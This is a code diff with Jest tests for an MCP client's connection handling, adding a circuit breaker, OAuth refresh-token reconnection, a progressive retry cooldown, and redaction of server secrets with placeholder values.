const data = (await tokenRes.json()) as { access_token: string };
return data.access_token;
}
it('should decrement cycle count after successful OAuth recovery', async () => {
const serverName = 'oauth-cycle-test';
MCPConnection.clearCooldown(serverName);
const conn = new MCPConnection({
serverName,
serverConfig: { type: 'streamable-http', url: oauthServer.url, initTimeout: 10000 },
userId: 'user-1',
});
// When oauthRequired fires, get a token and emit oauthHandled
// This triggers the oauthRecovery path inside connectClient
conn.on('oauthRequired', async () => {
const accessToken = await exchangeCodeForToken(oauthServer.url);
conn.setOAuthTokens({
access_token: accessToken,
token_type: 'Bearer',
} as MCPOAuthTokens);
conn.emit('oauthHandled');
});
// connect() → 401 → oauthRequired → oauthHandled → connectClient returns
// connect() sees not connected → throws "Connection not established"
await expect(conn.connect()).rejects.toThrow('Connection not established');
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cb = (MCPConnection as any).circuitBreakers.get(serverName);
const cyclesBeforeRetry = cb.cycleCount;
// Retry — should succeed and decrement cycle count via oauthRecovery
await conn.connect();
expect(await conn.isConnected()).toBe(true);
const cyclesAfterSuccess = cb.cycleCount;
// The retry adds +1 cycle (disconnect(false)) then -1 (oauthRecovery decrement)
// So cyclesAfterSuccess should equal cyclesBeforeRetry, not cyclesBeforeRetry + 1
expect(cyclesAfterSuccess).toBe(cyclesBeforeRetry);
await teardownConnection(conn);
});
it('should allow more OAuth reconnects than non-OAuth before breaker trips', async () => {
const serverName = 'oauth-budget';
MCPConnection.clearCooldown(serverName);
// Each OAuth flow: connect (+1) → 401 → oauthHandled → retry connect (+1) → success (-1) = net 1
// Without the decrement it would be net 2 per flow, tripping the breaker after ~2 users
let successfulFlows = 0;
for (let i = 0; i < 10; i++) {
const conn = new MCPConnection({
serverName,
serverConfig: { type: 'streamable-http', url: oauthServer.url, initTimeout: 10000 },
userId: `user-${i}`,
});
conn.on('oauthRequired', async () => {
const accessToken = await exchangeCodeForToken(oauthServer.url);
conn.setOAuthTokens({
access_token: accessToken,
token_type: 'Bearer',
} as MCPOAuthTokens);
conn.emit('oauthHandled');
});
try {
// First connect: 401 → oauthHandled → returns without connection
await conn.connect().catch(() => {});
// Retry: succeeds with token, decrements cycle
await conn.connect();
successfulFlows++;
await teardownConnection(conn);
} catch (e) {
conn.removeAllListeners();
if ((e as Error).message.includes('Circuit breaker is open')) {
break;
}
}
}
// With the oauthRecovery decrement, each flow is net ~1 cycle instead of ~2,
// so we should get more successful flows before the breaker trips
expect(successfulFlows).toBeGreaterThanOrEqual(3);
});
it('should not decrement cycle count when OAuth fails', async () => {
const serverName = 'oauth-failed-no-decrement';
MCPConnection.clearCooldown(serverName);
const conn = new MCPConnection({
serverName,
serverConfig: { type: 'streamable-http', url: oauthServer.url, initTimeout: 10000 },
userId: 'user-1',
});
conn.on('oauthRequired', () => {
conn.emit('oauthFailed', new Error('user denied'));
});
await expect(conn.connect()).rejects.toThrow();
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const cb = (MCPConnection as any).circuitBreakers.get(serverName);
const cyclesAfterFailure = cb.cycleCount;
// connect() recorded +1 cycle, oauthFailed should NOT decrement
expect(cyclesAfterFailure).toBeGreaterThanOrEqual(1);
conn.removeAllListeners();
});
});
/* ------------------------------------------------------------------ */
/* Sanity: Real transport works end-to-end */
/* ------------------------------------------------------------------ */
describe('Sanity: Real MCP SDK transport works correctly', () => {
it('connects, lists tools, and disconnects cleanly', async () => {
const srv = await startMCPServer();
const conn = createConnection('sanity', srv.url);
await conn.connect();
expect(await conn.isConnected()).toBe(true);
const tools = await conn.fetchTools();
expect(tools).toEqual(expect.arrayContaining([expect.objectContaining({ name: 'echo' })]));
await teardownConnection(conn);
await srv.close();
});
});

View file

@ -1,4 +1,5 @@
import { normalizeServerName } from '../utils'; import { normalizeServerName, redactServerSecrets, redactAllServerSecrets } from '~/mcp/utils';
import type { ParsedServerConfig } from '~/mcp/types';
describe('normalizeServerName', () => { describe('normalizeServerName', () => {
it('should not modify server names that already match the pattern', () => { it('should not modify server names that already match the pattern', () => {
@ -26,3 +27,201 @@ describe('normalizeServerName', () => {
expect(result).toMatch(/^[a-zA-Z0-9_.-]+$/); expect(result).toMatch(/^[a-zA-Z0-9_.-]+$/);
}); });
}); });
describe('redactServerSecrets', () => {
it('should strip apiKey.key from admin-sourced keys', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
apiKey: {
source: 'admin',
authorization_type: 'bearer',
key: 'super-secret-api-key',
},
};
const redacted = redactServerSecrets(config);
expect(redacted.apiKey?.key).toBeUndefined();
expect(redacted.apiKey?.source).toBe('admin');
expect(redacted.apiKey?.authorization_type).toBe('bearer');
});
it('should strip oauth.client_secret', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
oauth: {
client_id: 'my-client',
client_secret: 'super-secret-oauth',
scope: 'read',
},
};
const redacted = redactServerSecrets(config);
expect(redacted.oauth?.client_secret).toBeUndefined();
expect(redacted.oauth?.client_id).toBe('my-client');
expect(redacted.oauth?.scope).toBe('read');
});
it('should strip both apiKey.key and oauth.client_secret simultaneously', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
apiKey: {
source: 'admin',
authorization_type: 'custom',
custom_header: 'X-API-Key',
key: 'secret-key',
},
oauth: {
client_id: 'cid',
client_secret: 'csecret',
},
};
const redacted = redactServerSecrets(config);
expect(redacted.apiKey?.key).toBeUndefined();
expect(redacted.apiKey?.custom_header).toBe('X-API-Key');
expect(redacted.oauth?.client_secret).toBeUndefined();
expect(redacted.oauth?.client_id).toBe('cid');
});
it('should exclude headers from SSE configs', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
title: 'SSE Server',
};
(config as ParsedServerConfig & { headers: Record<string, string> }).headers = {
Authorization: 'Bearer admin-token-123',
'X-Custom': 'safe-value',
};
const redacted = redactServerSecrets(config);
expect((redacted as Record<string, unknown>).headers).toBeUndefined();
expect(redacted.title).toBe('SSE Server');
});
it('should exclude env from stdio configs', () => {
const config: ParsedServerConfig = {
type: 'stdio',
command: 'node',
args: ['server.js'],
env: { DATABASE_URL: 'postgres://admin:password@localhost/db', PATH: '/usr/bin' },
};
const redacted = redactServerSecrets(config);
expect((redacted as Record<string, unknown>).env).toBeUndefined();
expect((redacted as Record<string, unknown>).command).toBeUndefined();
expect((redacted as Record<string, unknown>).args).toBeUndefined();
});
it('should exclude oauth_headers', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
oauth_headers: { Authorization: 'Bearer oauth-admin-token' },
};
const redacted = redactServerSecrets(config);
expect((redacted as Record<string, unknown>).oauth_headers).toBeUndefined();
});
it('should strip apiKey.key even for user-sourced keys', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
apiKey: { source: 'user', authorization_type: 'bearer', key: 'my-own-key' },
};
const redacted = redactServerSecrets(config);
expect(redacted.apiKey?.key).toBeUndefined();
expect(redacted.apiKey?.source).toBe('user');
});
it('should not mutate the original config', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'secret' },
oauth: { client_id: 'cid', client_secret: 'csecret' },
};
redactServerSecrets(config);
expect(config.apiKey?.key).toBe('secret');
expect(config.oauth?.client_secret).toBe('csecret');
});
it('should preserve all safe metadata fields', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
title: 'My Server',
description: 'A test server',
iconPath: '/icons/test.png',
chatMenu: true,
requiresOAuth: false,
capabilities: '{"tools":{}}',
tools: 'tool_a, tool_b',
dbId: 'abc123',
updatedAt: 1700000000000,
consumeOnly: false,
inspectionFailed: false,
customUserVars: { API_KEY: { title: 'API Key', description: 'Your key' } },
};
const redacted = redactServerSecrets(config);
expect(redacted.title).toBe('My Server');
expect(redacted.description).toBe('A test server');
expect(redacted.iconPath).toBe('/icons/test.png');
expect(redacted.chatMenu).toBe(true);
expect(redacted.requiresOAuth).toBe(false);
expect(redacted.capabilities).toBe('{"tools":{}}');
expect(redacted.tools).toBe('tool_a, tool_b');
expect(redacted.dbId).toBe('abc123');
expect(redacted.updatedAt).toBe(1700000000000);
expect(redacted.consumeOnly).toBe(false);
expect(redacted.inspectionFailed).toBe(false);
expect(redacted.customUserVars).toEqual(config.customUserVars);
});
it('should pass URLs through unchanged', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://mcp.example.com/sse?param=value',
};
const redacted = redactServerSecrets(config);
expect(redacted.url).toBe('https://mcp.example.com/sse?param=value');
});
it('should only include explicitly allowlisted fields', () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
title: 'Test',
};
(config as Record<string, unknown>).someNewSensitiveField = 'leaked-value';
const redacted = redactServerSecrets(config);
expect((redacted as Record<string, unknown>).someNewSensitiveField).toBeUndefined();
expect(redacted.title).toBe('Test');
});
});
describe('redactAllServerSecrets', () => {
it('should redact secrets from all configs in the map', () => {
const configs: Record<string, ParsedServerConfig> = {
'server-a': {
type: 'sse',
url: 'https://a.com/mcp',
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'key-a' },
},
'server-b': {
type: 'sse',
url: 'https://b.com/mcp',
oauth: { client_id: 'cid-b', client_secret: 'secret-b' },
},
'server-c': {
type: 'stdio',
command: 'node',
args: ['c.js'],
},
};
const redacted = redactAllServerSecrets(configs);
expect(redacted['server-a'].apiKey?.key).toBeUndefined();
expect(redacted['server-a'].apiKey?.source).toBe('admin');
expect(redacted['server-b'].oauth?.client_secret).toBeUndefined();
expect(redacted['server-b'].oauth?.client_id).toBe('cid-b');
expect((redacted['server-c'] as Record<string, unknown>).command).toBeUndefined();
});
});

View file

@ -71,6 +71,17 @@ const FIVE_MINUTES = 5 * 60 * 1000;
const DEFAULT_TIMEOUT = 60000; const DEFAULT_TIMEOUT = 60000;
/** SSE connections through proxies may need longer initial handshake time */ /** SSE connections through proxies may need longer initial handshake time */
const SSE_CONNECT_TIMEOUT = 120000; const SSE_CONNECT_TIMEOUT = 120000;
const DEFAULT_INIT_TIMEOUT = 30000;
interface CircuitBreakerState {
cycleCount: number;
cycleWindowStart: number;
cooldownUntil: number;
failedRounds: number;
failedWindowStart: number;
failedBackoffUntil: number;
}
/** Default body timeout for Streamable HTTP GET SSE streams that idle between server pushes */ /** Default body timeout for Streamable HTTP GET SSE streams that idle between server pushes */
const DEFAULT_SSE_READ_TIMEOUT = FIVE_MINUTES; const DEFAULT_SSE_READ_TIMEOUT = FIVE_MINUTES;
@ -262,6 +273,7 @@ export class MCPConnection extends EventEmitter {
private oauthTokens?: MCPOAuthTokens | null; private oauthTokens?: MCPOAuthTokens | null;
private requestHeaders?: Record<string, string> | null; private requestHeaders?: Record<string, string> | null;
private oauthRequired = false; private oauthRequired = false;
private oauthRecovery = false;
private readonly useSSRFProtection: boolean; private readonly useSSRFProtection: boolean;
iconPath?: string; iconPath?: string;
timeout?: number; timeout?: number;
@ -274,6 +286,88 @@ export class MCPConnection extends EventEmitter {
*/ */
public readonly createdAt: number; public readonly createdAt: number;
private static circuitBreakers: Map<string, CircuitBreakerState> = new Map();
public static clearCooldown(serverName: string): void {
MCPConnection.circuitBreakers.delete(serverName);
logger.debug(`[MCP][${serverName}] Circuit breaker state cleared`);
}
private getCircuitBreaker(): CircuitBreakerState {
let cb = MCPConnection.circuitBreakers.get(this.serverName);
if (!cb) {
cb = {
cycleCount: 0,
cycleWindowStart: Date.now(),
cooldownUntil: 0,
failedRounds: 0,
failedWindowStart: Date.now(),
failedBackoffUntil: 0,
};
MCPConnection.circuitBreakers.set(this.serverName, cb);
}
return cb;
}
private isCircuitOpen(): boolean {
const cb = this.getCircuitBreaker();
const now = Date.now();
return now < cb.cooldownUntil || now < cb.failedBackoffUntil;
}
private recordCycle(): void {
const cb = this.getCircuitBreaker();
const now = Date.now();
if (now - cb.cycleWindowStart > mcpConfig.CB_CYCLE_WINDOW_MS) {
cb.cycleCount = 0;
cb.cycleWindowStart = now;
}
cb.cycleCount++;
if (cb.cycleCount >= mcpConfig.CB_MAX_CYCLES) {
cb.cooldownUntil = now + mcpConfig.CB_CYCLE_COOLDOWN_MS;
cb.cycleCount = 0;
cb.cycleWindowStart = now;
logger.warn(
`${this.getLogPrefix()} Circuit breaker: too many cycles, cooling down for ${mcpConfig.CB_CYCLE_COOLDOWN_MS}ms`,
);
}
}
private recordFailedRound(): void {
const cb = this.getCircuitBreaker();
const now = Date.now();
if (now - cb.failedWindowStart > mcpConfig.CB_FAILED_WINDOW_MS) {
cb.failedRounds = 0;
cb.failedWindowStart = now;
}
cb.failedRounds++;
if (cb.failedRounds >= mcpConfig.CB_MAX_FAILED_ROUNDS) {
const backoff = Math.min(
mcpConfig.CB_BASE_BACKOFF_MS *
Math.pow(2, cb.failedRounds - mcpConfig.CB_MAX_FAILED_ROUNDS),
mcpConfig.CB_MAX_BACKOFF_MS,
);
cb.failedBackoffUntil = now + backoff;
logger.warn(
`${this.getLogPrefix()} Circuit breaker: too many failures, backing off for ${backoff}ms`,
);
}
}
private resetFailedRounds(): void {
const cb = this.getCircuitBreaker();
cb.failedRounds = 0;
cb.failedWindowStart = Date.now();
cb.failedBackoffUntil = 0;
}
public static decrementCycleCount(serverName: string): void {
const cb = MCPConnection.circuitBreakers.get(serverName);
if (cb && cb.cycleCount > 0) {
cb.cycleCount--;
}
}
setRequestHeaders(headers: Record<string, string> | null): void { setRequestHeaders(headers: Record<string, string> | null): void {
if (!headers) { if (!headers) {
return; return;
@ -686,6 +780,12 @@ export class MCPConnection extends EventEmitter {
return; return;
} }
if (this.isCircuitOpen()) {
this.connectionState = 'error';
this.emit('connectionChange', 'error');
throw new Error(`${this.getLogPrefix()} Circuit breaker is open, connection attempt blocked`);
}
this.emit('connectionChange', 'connecting'); this.emit('connectionChange', 'connecting');
this.connectPromise = (async () => { this.connectPromise = (async () => {
@ -703,7 +803,7 @@ export class MCPConnection extends EventEmitter {
this.transport = await runOutsideTracing(() => this.constructTransport(this.options)); this.transport = await runOutsideTracing(() => this.constructTransport(this.options));
this.patchTransportSend(); this.patchTransportSend();
const connectTimeout = this.options.initTimeout ?? 120000; const connectTimeout = this.options.initTimeout ?? DEFAULT_INIT_TIMEOUT;
await runOutsideTracing(() => await runOutsideTracing(() =>
withTimeout( withTimeout(
this.client.connect(this.transport!), this.client.connect(this.transport!),
@ -716,6 +816,14 @@ export class MCPConnection extends EventEmitter {
this.connectionState = 'connected'; this.connectionState = 'connected';
this.emit('connectionChange', 'connected'); this.emit('connectionChange', 'connected');
this.reconnectAttempts = 0; this.reconnectAttempts = 0;
this.resetFailedRounds();
if (this.oauthRecovery) {
MCPConnection.decrementCycleCount(this.serverName);
this.oauthRecovery = false;
logger.debug(
`${this.getLogPrefix()} OAuth recovery: decremented cycle count after successful reconnect`,
);
}
} catch (error) { } catch (error) {
// Check if it's a rate limit error - stop immediately to avoid making it worse // Check if it's a rate limit error - stop immediately to avoid making it worse
if (this.isRateLimitError(error)) { if (this.isRateLimitError(error)) {
@ -799,9 +907,8 @@ export class MCPConnection extends EventEmitter {
try { try {
// Wait for OAuth to be handled // Wait for OAuth to be handled
await oauthHandledPromise; await oauthHandledPromise;
// Reset the oauthRequired flag
this.oauthRequired = false; this.oauthRequired = false;
// Don't throw the error - just return so connection can be retried this.oauthRecovery = true;
logger.info( logger.info(
`${this.getLogPrefix()} OAuth handled successfully, connection will be retried`, `${this.getLogPrefix()} OAuth handled successfully, connection will be retried`,
); );
@ -817,6 +924,7 @@ export class MCPConnection extends EventEmitter {
this.connectionState = 'error'; this.connectionState = 'error';
this.emit('connectionChange', 'error'); this.emit('connectionChange', 'error');
this.recordFailedRound();
throw error; throw error;
} finally { } finally {
this.connectPromise = null; this.connectPromise = null;
@ -866,7 +974,8 @@ export class MCPConnection extends EventEmitter {
async connect(): Promise<void> { async connect(): Promise<void> {
try { try {
await this.disconnect(); // preserve cycle tracking across reconnects so the circuit breaker can detect rapid cycling
await this.disconnect(false);
await this.connectClient(); await this.connectClient();
if (!(await this.isConnected())) { if (!(await this.isConnected())) {
throw new Error('Connection not established'); throw new Error('Connection not established');
@ -906,7 +1015,7 @@ export class MCPConnection extends EventEmitter {
isTransient, isTransient,
} = extractSSEErrorMessage(error); } = extractSSEErrorMessage(error);
if (errorCode === 404) { if (errorCode === 400 || errorCode === 404 || errorCode === 405) {
const hasSession = const hasSession =
'sessionId' in transport && 'sessionId' in transport &&
(transport as { sessionId?: string }).sessionId != null && (transport as { sessionId?: string }).sessionId != null &&
@ -914,14 +1023,14 @@ export class MCPConnection extends EventEmitter {
if (!hasSession && errorMessage.toLowerCase().includes('failed to open sse stream')) { if (!hasSession && errorMessage.toLowerCase().includes('failed to open sse stream')) {
logger.warn( logger.warn(
`${this.getLogPrefix()} SSE stream not available (404), no session. Ignoring.`, `${this.getLogPrefix()} SSE stream not available (${errorCode}), no session. Ignoring.`,
); );
return; return;
} }
if (hasSession) { if (hasSession) {
logger.warn( logger.warn(
`${this.getLogPrefix()} 404 with active session — session lost, triggering reconnection.`, `${this.getLogPrefix()} ${errorCode} with active session — session lost, triggering reconnection.`,
); );
} }
} }
@ -992,7 +1101,7 @@ export class MCPConnection extends EventEmitter {
await Promise.all(closing); await Promise.all(closing);
} }
public async disconnect(): Promise<void> { public async disconnect(resetCycleTracking = true): Promise<void> {
try { try {
if (this.transport) { if (this.transport) {
await this.client.close(); await this.client.close();
@ -1006,6 +1115,9 @@ export class MCPConnection extends EventEmitter {
this.emit('connectionChange', 'disconnected'); this.emit('connectionChange', 'disconnected');
} finally { } finally {
this.connectPromise = null; this.connectPromise = null;
if (!resetCycleTracking) {
this.recordCycle();
}
} }
} }

View file

@ -12,4 +12,18 @@ export const mcpConfig = {
USER_CONNECTION_IDLE_TIMEOUT: math( USER_CONNECTION_IDLE_TIMEOUT: math(
process.env.MCP_USER_CONNECTION_IDLE_TIMEOUT ?? 15 * 60 * 1000, process.env.MCP_USER_CONNECTION_IDLE_TIMEOUT ?? 15 * 60 * 1000,
), ),
/** Max connect/disconnect cycles before the circuit breaker trips. Default: 7 */
CB_MAX_CYCLES: math(process.env.MCP_CB_MAX_CYCLES ?? 7),
/** Sliding window (ms) for counting cycles. Default: 45s */
CB_CYCLE_WINDOW_MS: math(process.env.MCP_CB_CYCLE_WINDOW_MS ?? 45_000),
/** Cooldown (ms) after the cycle breaker trips. Default: 15s */
CB_CYCLE_COOLDOWN_MS: math(process.env.MCP_CB_CYCLE_COOLDOWN_MS ?? 15_000),
/** Max consecutive failed connection rounds before backoff. Default: 3 */
CB_MAX_FAILED_ROUNDS: math(process.env.MCP_CB_MAX_FAILED_ROUNDS ?? 3),
/** Sliding window (ms) for counting failed rounds. Default: 120s */
CB_FAILED_WINDOW_MS: math(process.env.MCP_CB_FAILED_WINDOW_MS ?? 120_000),
/** Base backoff (ms) after failed round threshold is reached. Default: 30s */
CB_BASE_BACKOFF_MS: math(process.env.MCP_CB_BASE_BACKOFF_MS ?? 30_000),
/** Max backoff cap (ms) for exponential backoff. Default: 300s */
CB_MAX_BACKOFF_MS: math(process.env.MCP_CB_MAX_BACKOFF_MS ?? 300_000),
}; };

View file

@ -253,17 +253,21 @@ describe('OAuthReconnectionManager', () => {
expect(mockMCPManager.disconnectUserConnection).toHaveBeenCalledWith(userId, 'server1'); expect(mockMCPManager.disconnectUserConnection).toHaveBeenCalledWith(userId, 'server1');
}); });
it('should not reconnect servers with expired tokens', async () => { it('should not reconnect servers with expired tokens and no refresh token', async () => {
const userId = 'user-123'; const userId = 'user-123';
const oauthServers = new Set(['server1']); const oauthServers = new Set(['server1']);
(mockRegistryInstance.getOAuthServers as jest.Mock).mockResolvedValue(oauthServers); (mockRegistryInstance.getOAuthServers as jest.Mock).mockResolvedValue(oauthServers);
// server1: has expired token tokenMethods.findToken.mockImplementation(async ({ identifier }) => {
tokenMethods.findToken.mockResolvedValue({ if (identifier === 'mcp:server1') {
return {
userId, userId,
identifier: 'mcp:server1', identifier,
expiresAt: new Date(Date.now() - 3600000), // 1 hour ago expiresAt: new Date(Date.now() - 3600000),
} as unknown as MCPOAuthTokens); } as unknown as MCPOAuthTokens;
}
return null;
});
await reconnectionManager.reconnectServers(userId); await reconnectionManager.reconnectServers(userId);
@ -272,6 +276,87 @@ describe('OAuthReconnectionManager', () => {
expect(mockMCPManager.getUserConnection).not.toHaveBeenCalled(); expect(mockMCPManager.getUserConnection).not.toHaveBeenCalled();
}); });
it('should reconnect servers with expired access token but valid refresh token', async () => {
const userId = 'user-123';
const oauthServers = new Set(['server1']);
(mockRegistryInstance.getOAuthServers as jest.Mock).mockResolvedValue(oauthServers);
tokenMethods.findToken.mockImplementation(async ({ identifier }) => {
if (identifier === 'mcp:server1') {
return {
userId,
identifier,
expiresAt: new Date(Date.now() - 3600000),
} as unknown as MCPOAuthTokens;
}
if (identifier === 'mcp:server1:refresh') {
return {
userId,
identifier,
} as unknown as MCPOAuthTokens;
}
return null;
});
const mockNewConnection = {
isConnected: jest.fn().mockResolvedValue(true),
disconnect: jest.fn(),
};
mockMCPManager.getUserConnection.mockResolvedValue(
mockNewConnection as unknown as MCPConnection,
);
(mockRegistryInstance.getServerConfig as jest.Mock).mockResolvedValue(
{} as unknown as MCPOptions,
);
await reconnectionManager.reconnectServers(userId);
expect(reconnectionTracker.isActive(userId, 'server1')).toBe(true);
await new Promise((resolve) => setTimeout(resolve, 100));
expect(mockMCPManager.getUserConnection).toHaveBeenCalledWith(
expect.objectContaining({ serverName: 'server1' }),
);
});
it('should reconnect when access token is TTL-deleted but refresh token exists', async () => {
const userId = 'user-123';
const oauthServers = new Set(['server1']);
(mockRegistryInstance.getOAuthServers as jest.Mock).mockResolvedValue(oauthServers);
tokenMethods.findToken.mockImplementation(async ({ identifier }) => {
if (identifier === 'mcp:server1:refresh') {
return {
userId,
identifier,
} as unknown as MCPOAuthTokens;
}
return null;
});
const mockNewConnection = {
isConnected: jest.fn().mockResolvedValue(true),
disconnect: jest.fn(),
};
mockMCPManager.getUserConnection.mockResolvedValue(
mockNewConnection as unknown as MCPConnection,
);
(mockRegistryInstance.getServerConfig as jest.Mock).mockResolvedValue(
{} as unknown as MCPOptions,
);
await reconnectionManager.reconnectServers(userId);
expect(reconnectionTracker.isActive(userId, 'server1')).toBe(true);
await new Promise((resolve) => setTimeout(resolve, 100));
expect(mockMCPManager.getUserConnection).toHaveBeenCalledWith(
expect.objectContaining({ serverName: 'server1' }),
);
});
it('should handle connection that returns but is not connected', async () => { it('should handle connection that returns but is not connected', async () => {
const userId = 'user-123'; const userId = 'user-123';
const oauthServers = new Set(['server1']); const oauthServers = new Set(['server1']);
@ -336,6 +421,69 @@ describe('OAuthReconnectionManager', () => {
}); });
}); });
describe('reconnectServer', () => {
let reconnectionTracker: OAuthReconnectionTracker;
beforeEach(async () => {
reconnectionTracker = new OAuthReconnectionTracker();
reconnectionManager = await OAuthReconnectionManager.createInstance(
flowManager,
tokenMethods,
reconnectionTracker,
);
});
it('should return true on successful reconnection', async () => {
const userId = 'user-123';
const serverName = 'server1';
const mockConnection = {
isConnected: jest.fn().mockResolvedValue(true),
disconnect: jest.fn(),
};
mockMCPManager.getUserConnection.mockResolvedValue(
mockConnection as unknown as MCPConnection,
);
(mockRegistryInstance.getServerConfig as jest.Mock).mockResolvedValue(
{} as unknown as MCPOptions,
);
const result = await reconnectionManager.reconnectServer(userId, serverName);
expect(result).toBe(true);
});
it('should return false on failed reconnection', async () => {
const userId = 'user-123';
const serverName = 'server1';
mockMCPManager.getUserConnection.mockRejectedValue(new Error('Connection failed'));
(mockRegistryInstance.getServerConfig as jest.Mock).mockResolvedValue(
{} as unknown as MCPOptions,
);
const result = await reconnectionManager.reconnectServer(userId, serverName);
expect(result).toBe(false);
});
it('should return false when MCPManager is not available', async () => {
const userId = 'user-123';
const serverName = 'server1';
(OAuthReconnectionManager as unknown as { instance: null }).instance = null;
(MCPManager.getInstance as jest.Mock).mockImplementation(() => {
throw new Error('MCPManager has not been initialized.');
});
const managerWithoutMCP = await OAuthReconnectionManager.createInstance(
flowManager,
tokenMethods,
reconnectionTracker,
);
const result = await managerWithoutMCP.reconnectServer(userId, serverName);
expect(result).toBe(false);
});
});
describe('reconnection staggering', () => { describe('reconnection staggering', () => {
let reconnectionTracker: OAuthReconnectionTracker; let reconnectionTracker: OAuthReconnectionTracker;

View file

@ -96,6 +96,24 @@ export class OAuthReconnectionManager {
} }
} }
/**
* Attempts to reconnect a single OAuth MCP server.
* @returns true if reconnection succeeded, false otherwise.
*/
public async reconnectServer(userId: string, serverName: string): Promise<boolean> {
if (this.mcpManager == null) {
return false;
}
this.reconnectionsTracker.setActive(userId, serverName);
try {
await this.tryReconnect(userId, serverName);
return !this.reconnectionsTracker.isFailed(userId, serverName);
} catch {
return false;
}
}
public clearReconnection(userId: string, serverName: string) { public clearReconnection(userId: string, serverName: string) {
this.reconnectionsTracker.removeFailed(userId, serverName); this.reconnectionsTracker.removeFailed(userId, serverName);
this.reconnectionsTracker.removeActive(userId, serverName); this.reconnectionsTracker.removeActive(userId, serverName);
@ -174,23 +192,31 @@ export class OAuthReconnectionManager {
} }
} }
// if the server has no tokens for the user, don't attempt to reconnect // if the server has a valid (non-expired) access token, allow reconnect
const accessToken = await this.tokenMethods.findToken({ const accessToken = await this.tokenMethods.findToken({
userId, userId,
type: 'mcp_oauth', type: 'mcp_oauth',
identifier: `mcp:${serverName}`, identifier: `mcp:${serverName}`,
}); });
if (accessToken == null) {
return false;
}
// if the token has expired, don't attempt to reconnect if (accessToken != null) {
const now = new Date(); const now = new Date();
if (accessToken.expiresAt && accessToken.expiresAt < now) { if (!accessToken.expiresAt || accessToken.expiresAt >= now) {
return true;
}
}
// if the access token is expired or TTL-deleted, fall back to refresh token
const refreshToken = await this.tokenMethods.findToken({
userId,
type: 'mcp_oauth',
identifier: `mcp:${serverName}:refresh`,
});
if (refreshToken == null) {
return false; return false;
} }
// …otherwise, we're good to go with the reconnect attempt
return true; return true;
} }
} }

View file

@ -397,6 +397,101 @@ describe('OAuthReconnectTracker', () => {
}); });
}); });
describe('cooldown-based retry', () => {
beforeEach(() => {
jest.useFakeTimers();
});
afterEach(() => {
jest.useRealTimers();
});
it('should return true from isFailed within first cooldown period (5 min)', () => {
const now = Date.now();
jest.setSystemTime(now);
tracker.setFailed(userId, serverName);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(4 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(true);
});
it('should return false from isFailed after first cooldown elapses (5 min)', () => {
const now = Date.now();
jest.setSystemTime(now);
tracker.setFailed(userId, serverName);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
});
it('should use progressive cooldown schedule (5m, 10m, 20m, 30m)', () => {
const now = Date.now();
jest.setSystemTime(now);
// First failure: 5 min cooldown
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
// Second failure: 10 min cooldown
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(9 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(1 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
// Third failure: 20 min cooldown
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(19 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(1 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
// Fourth failure: 30 min cooldown
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(29 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(1 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
});
it('should cap cooldown at 30 min for attempts beyond 4', () => {
const now = Date.now();
jest.setSystemTime(now);
for (let i = 0; i < 5; i++) {
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(30 * 60 * 1000);
}
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(29 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(true);
jest.advanceTimersByTime(1 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
});
it('should fully reset metadata on removeFailed', () => {
const now = Date.now();
jest.setSystemTime(now);
tracker.setFailed(userId, serverName);
tracker.setFailed(userId, serverName);
tracker.setFailed(userId, serverName);
tracker.removeFailed(userId, serverName);
expect(tracker.isFailed(userId, serverName)).toBe(false);
tracker.setFailed(userId, serverName);
jest.advanceTimersByTime(5 * 60 * 1000);
expect(tracker.isFailed(userId, serverName)).toBe(false);
});
});
describe('timestamp tracking edge cases', () => { describe('timestamp tracking edge cases', () => {
beforeEach(() => { beforeEach(() => {
jest.useFakeTimers(); jest.useFakeTimers();

View file

@ -1,6 +1,12 @@
interface FailedMeta {
attempts: number;
lastFailedAt: number;
}
const COOLDOWN_SCHEDULE_MS = [5 * 60 * 1000, 10 * 60 * 1000, 20 * 60 * 1000, 30 * 60 * 1000];
export class OAuthReconnectionTracker { export class OAuthReconnectionTracker {
/** Map of userId -> Set of serverNames that have failed reconnection */ private failedMeta: Map<string, Map<string, FailedMeta>> = new Map();
private failed: Map<string, Set<string>> = new Map();
/** Map of userId -> Set of serverNames that are actively reconnecting */ /** Map of userId -> Set of serverNames that are actively reconnecting */
private active: Map<string, Set<string>> = new Map(); private active: Map<string, Set<string>> = new Map();
